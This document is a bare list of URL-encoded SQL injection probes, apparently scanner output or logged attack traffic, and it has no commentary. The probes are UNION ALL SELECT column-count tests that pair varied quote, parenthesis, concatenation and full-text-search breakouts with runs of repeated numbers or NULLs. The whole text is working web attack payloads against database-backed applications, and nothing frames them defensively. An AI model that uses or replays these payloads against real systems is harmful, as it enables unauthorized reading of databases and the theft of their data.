-2189%00%27%20UNION%20ALL%20SELECT%208352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%2C8352%23 -8020%00%27%20UNION%20ALL%20SELECT%203275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%23 -9261%27%29%20WHERE%209316%3D9316%20UNION%20ALL%20SELECT%209316%2C9316%2C9316%2C9316%2C9316%2C9316%2C9316%2C9316%2C9316%2C9316%2C9316%23 -2316%27%29%20WHERE%208346%3D8346%20UNION%20ALL%20SELECT%208346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%2C8346%23 -5796%27%29%20WHERE%209332%3D9332%20UNION%20ALL%20SELECT%209332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%23 -8234%27%29%20WHERE%206974%3D6974%20UNION%20ALL%20SELECT%206974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%2C6974%23 -3716%27%29%20WHERE%209391%3D9391%20UNION%20ALL%20SELECT%209391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%2C9391%23 -8484%27%29%20WHERE%202419%3D2419%20UNION%20ALL%20SELECT%202419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%23 -4923%27%29%20WHERE%208658%3D8658%20UNION%20ALL%20SELECT%208658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%2C8658%23 -7312%27%29%20WHERE%206664%3D6664%20UNION%20ALL%20SELECT%206664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%23 -7623%27%29%20WHERE%202604%3D2604%20UNION%20ALL%20SELECT%202604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%2C2604%23 -5184%27%29%20WHERE%204214%3D4214%20UNION%20ALL%20SELECT%204214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%2C4214%23 -8909%22%29%20WHERE%204322%3D4322%20UNION%20ALL%20SELECT%204322%2C4322%2C4322%2C4322%2C4322%2C4322%2C4322%2C4322%2C4322%2C4322%2C4322%23 -5938%22%29%20WHERE%208151%3D8151%20UNION%20ALL%20SELECT%208151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%23 -5350%22%29%20WHERE%201594%3D1594%20UNION%20ALL%20SELECT%201594%2C1594%2C1594%2C1594%2C1594%2C1594%2C1594%2C1594%2C1594%2C1594%2C1594%2C1594%2C1594%23 -4658%22%29%20WHERE%204187%3D4187%20UNION%20ALL%20SELECT%204187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%2C4187%23 -9791%22%29%20WHERE%205369%3D5369%20UNION%20ALL%20SELECT%205369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%23 -7834%22%29%20WHERE%208631%3D8631%20UNION%20ALL%20SELECT%208631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%2C8631%23 -5254%22%29%20WHERE%209018%3D9018%20UNION%20ALL%20SELECT%209018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%2C9018%23 -3208%22%29%20WHERE%205593%3D5593%20UNION%20ALL%20SELECT%205593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%23 -3412%22%29%20WHERE%208615%3D8615%20UNION%20ALL%20SELECT%208615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%2C8615%23 -2592%22%29%20WHERE%209312%3D9312%20UNION%20ALL%20SELECT%209312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%2C9312%23 -7450%27%20WHERE%202257%3D2257%20UNION%20ALL%20SELECT%202257%2C2257%2C2257%2C2257%2C2257%2C2257%2C2257%2C2257%2C2257%2C2257%2C2257%23 -6799%27%20WHERE%209157%3D9157%20UNION%20ALL%20SELECT%209157%2C9157%2C9157%2C9157%2C9157%2C9157%2C9157%2C9157%2C9157%2C9157%2C9157%2C9157%23 -2952%27%20WHERE%202402%3D2402%20UNION%20ALL%20SELECT%202402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%2C2402%23 -8034%27%20WHERE%209920%3D9920%20UNION%20ALL%20SELECT%209920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%2C9920%23 -6143%27%20WHERE%206599%3D6599%20UNION%20ALL%20SELECT%206599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%23 -2918%27%20WHERE%204392%3D4392%20UNION%20ALL%20SELECT%204392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%2C4392%23 -6625%27%20WHERE%205825%3D5825%20UNION%20ALL%20SELECT%205825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%2C5825%23 -2428%27%20WHERE%202195%3D2195%20UNION%20ALL%20SELECT%202195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%23 -8519%27%20WHERE%208447%3D8447%20UNION%20ALL%20SELECT%208447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%23 -6312%27%20WHERE%207211%3D7211%20UNION%20ALL%20SELECT%207211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%2C7211%23 -2680%22%20WHERE%205436%3D5436%20UNION%20ALL%20SELECT%205436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%2C5436%23 -9668%22%20WHERE%205747%3D5747%20UNION%20ALL%20SELECT%205747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%2C5747%23 -8873%22%20WHERE%205206%3D5206%20UNION%20ALL%20SELECT%205206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%23 -1249%22%20WHERE%205918%3D5918%20UNION%20ALL%20SELECT%205918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%2C5918%23 -3045%22%20WHERE%209280%3D9280%20UNION%20ALL%20SELECT%209280%2C9280%2C9280%2C9280%2C9280%2C9280%2C9280%2C9280%2C9280%2C9280%2C9280%2C9280%2C9280%2C9280%2C9280%23 -4656%22%20WHERE%201017%3D1017%20UNION%20ALL%20SELECT%201017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%2C1017%23 -6248%22%20WHERE%201233%3D1233%20UNION%20ALL%20SELECT%201233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%2C1233%23 -9965%22%20WHERE%203107%3D3107%20UNION%20ALL%20SELECT%203107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%23 -3541%22%20WHERE%203030%3D3030%20UNION%20ALL%20SELECT%203030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%23 -2281%22%20WHERE%207747%3D7747%20UNION%20ALL%20SELECT%207747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%2C7747%23 -3733%27%7C%7C%28SELECT%20%27FcFv%27%20FROM%20DUAL%20WHERE%202125%3D2125%20UNION%20ALL%20SELECT%202125%2C2125%2C2125%2C2125%2C2125%2C2125%2C2125%2C2125%2C2125%2C2125%2C2125%23 -7912%27%7C%7C%28SELECT%20%27zbSk%27%20FROM%20DUAL%20WHERE%208839%3D8839%20UNION%20ALL%20SELECT%208839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%23 -6036%27%7C%7C%28SELECT%20%27jZEx%27%20FROM%20DUAL%20WHERE%201092%3D1092%20UNION%20ALL%20SELECT%201092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%23 -5753%27%7C%7C%28SELECT%20%27UmcU%27%20FROM%20DUAL%20WHERE%203681%3D3681%20UNION%20ALL%20SELECT%203681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%23 -2111%27%7C%7C%28SELECT%20%27bISh%27%20FROM%20DUAL%20WHERE%204731%3D4731%20UNION%20ALL%20SELECT%204731%2C4731%2C4731%2C4731%2C4731%2C4731%2C4731%2C4731%2C4731%2C4731%2C4731%2C4731%2C4731%2C4731%2C4731%23 -2093%27%7C%7C%28SELECT%20%27HONX%27%20FROM%20DUAL%20WHERE%206379%3D6379%20UNION%20ALL%20SELECT%206379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%23 -5436%27%7C%7C%28SELECT%20%27yJwv%27%20FROM%20DUAL%20WHERE%203561%3D3561%20UNION%20ALL%20SELECT%203561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%2C3561%23 -9499%27%7C%7C%28SELECT%20%27pyHv%27%20FROM%20DUAL%20WHERE%204777%3D4777%20UNION%20ALL%20SELECT%204777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%23 -7931%27%7C%7C%28SELECT%20%27bHOk%27%20FROM%20DUAL%20WHERE%208470%3D8470%20UNION%20ALL%20SELECT%208470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%2C8470%23 -2945%27%7C%7C%28SELECT%20%27maVH%27%20FROM%20DUAL%20WHERE%204383%3D4383%20UNION%20ALL%20SELECT%204383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%2C4383%23 -4799%27%7C%7C%28SELECT%20%27BVtb%27%20WHERE%209971%3D9971%20UNION%20ALL%20SELECT%209971%2C9971%2C9971%2C9971%2C9971%2C9971%2C9971%2C9971%2C9971%2C9971%2C9971%23 -1843%27%7C%7C%28SELECT%20%27MQYr%27%20WHERE%209330%3D9330%20UNION%20ALL%20SELECT%209330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%2C9330%23 -4726%27%7C%7C%28SELECT%20%27YTWB%27%20WHERE%206321%3D6321%20UNION%20ALL%20SELECT%206321%2C6321%2C6321%2C6321%2C6321%2C6321%2C6321%2C6321%2C6321%2C6321%2C6321%2C6321%2C6321%23 -9178%27%7C%7C%28SELECT%20%27ZujA%27%20WHERE%206404%3D6404%20UNION%20ALL%20SELECT%206404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%2C6404%23 -3706%27%7C%7C%28SELECT%20%27PXNK%27%20WHERE%209942%3D9942%20UNION%20ALL%20SELECT%209942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%23 -7049%27%7C%7C%28SELECT%20%27QRGB%27%20WHERE%205345%3D5345%20UNION%20ALL%20SELECT%205345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%23 -5422%27%7C%7C%28SELECT%20%27ZcFy%27%20WHERE%204130%3D4130%20UNION%20ALL%20SELECT%204130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%2C4130%23 -8398%27%7C%7C%28SELECT%20%27iGLi%27%20WHERE%208064%3D8064%20UNION%20ALL%20SELECT%208064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%2C8064%23 -9028%27%7C%7C%28SELECT%20%27hnnV%27%20WHERE%208679%3D8679%20UNION%20ALL%20SELECT%208679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%23 -6474%27%7C%7C%28SELECT%20%27ssdX%27%20WHERE%207845%3D7845%20UNION%20ALL%20SELECT%207845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%23 -5472%27%2B%28SELECT%20WcTi%20WHERE%206405%3D6405%20UNION%20ALL%20SELECT%206405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%2C6405%23 -8010%27%2B%28SELECT%20XzJH%20WHERE%201272%3D1272%20UNION%20ALL%20SELECT%201272%2C1272%2C1272%2C1272%2C1272%2C1272%2C1272%2C1272%2C1272%2C1272%2C1272%2C1272%23 -7664%27%2B%28SELECT%20MERv%20WHERE%208478%3D8478%20UNION%20ALL%20SELECT%208478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%2C8478%23 -7733%27%2B%28SELECT%20qcOO%20WHERE%202424%3D2424%20UNION%20ALL%20SELECT%202424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%2C2424%23 -8832%27%2B%28SELECT%20cXTE%20WHERE%205970%3D5970%20UNION%20ALL%20SELECT%205970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%2C5970%23 -9433%27%2B%28SELECT%20wlTS%20WHERE%206007%3D6007%20UNION%20ALL%20SELECT%206007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%23 -1700%27%2B%28SELECT%20Ghkk%20WHERE%209922%3D9922%20UNION%20ALL%20SELECT%209922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%2C9922%23 -9665%27%2B%28SELECT%20ZZsk%20WHERE%201445%3D1445%20UNION%20ALL%20SELECT%201445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%23 -4425%27%2B%28SELECT%20nzQH%20WHERE%208137%3D8137%20UNION%20ALL%20SELECT%208137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%23 -5406%27%2B%28SELECT%20fESc%20WHERE%207238%3D7238%20UNION%20ALL%20SELECT%207238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%23 -9548%27%2B%28SELECT%20%27mOEK%27%20WHERE%202101%3D2101%20UNION%20ALL%20SELECT%202101%2C2101%2C2101%2C2101%2C2101%2C2101%2C2101%2C2101%2C2101%2C2101%2C2101%23 -4075%27%2B%28SELECT%20%27yQOL%27%20WHERE%207066%3D7066%20UNION%20ALL%20SELECT%207066%2C7066%2C7066%2C7066%2C7066%2C7066%2C7066%2C7066%2C7066%2C7066%2C7066%2C7066%23 -2238%27%2B%28SELECT%20%27DWfB%27%20WHERE%203645%3D3645%20UNION%20ALL%20SELECT%203645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%2C3645%23 -7035%27%2B%28SELECT%20%27CJzm%27%20WHERE%204236%3D4236%20UNION%20ALL%20SELECT%204236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%2C4236%23 -4027%27%2B%28SELECT%20%27BdjN%27%20WHERE%205742%3D5742%20UNION%20ALL%20SELECT%205742%2C5742%2C5742%2C5742%2C5742%2C5742%2C5742%2C5742%2C5742%2C5742%2C5742%2C5742%2C5742%2C5742%2C5742%23 -6732%27%2B%28SELECT%20%27vONe%27%20WHERE%203578%3D3578%20UNION%20ALL%20SELECT%203578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%2C3578%23 -3364%27%2B%28SELECT%20%27OsDo%27%20WHERE%201949%3D1949%20UNION%20ALL%20SELECT%201949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%23 -3263%27%2B%28SELECT%20%27mbEz%27%20WHERE%205999%3D5999%20UNION%20ALL%20SELECT%205999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%2C5999%23 -2601%27%2B%28SELECT%20%27pYrn%27%20WHERE%203170%3D3170%20UNION%20ALL%20SELECT%203170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%2C3170%23 -8072%27%2B%28SELECT%20%27dImy%27%20WHERE%204643%3D4643%20UNION%20ALL%20SELECT%204643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%23 -6224%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%23 -9817%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%23 -9086%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%23 -4900%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207759%2C7759%2C7759%2C7759%2C7759%2C7759%2C7759%2C7759%2C7759%2C7759%2C7759%2C7759%2C7759%2C7759%23 -2870%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202847%2C2847%2C2847%2C2847%2C2847%2C2847%2C2847%2C2847%2C2847%2C2847%2C2847%2C2847%2C2847%2C2847%2C2847%23 -4510%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%23 -6820%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%2C1686%23 -8036%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%23 -3021%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%23 -6522%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 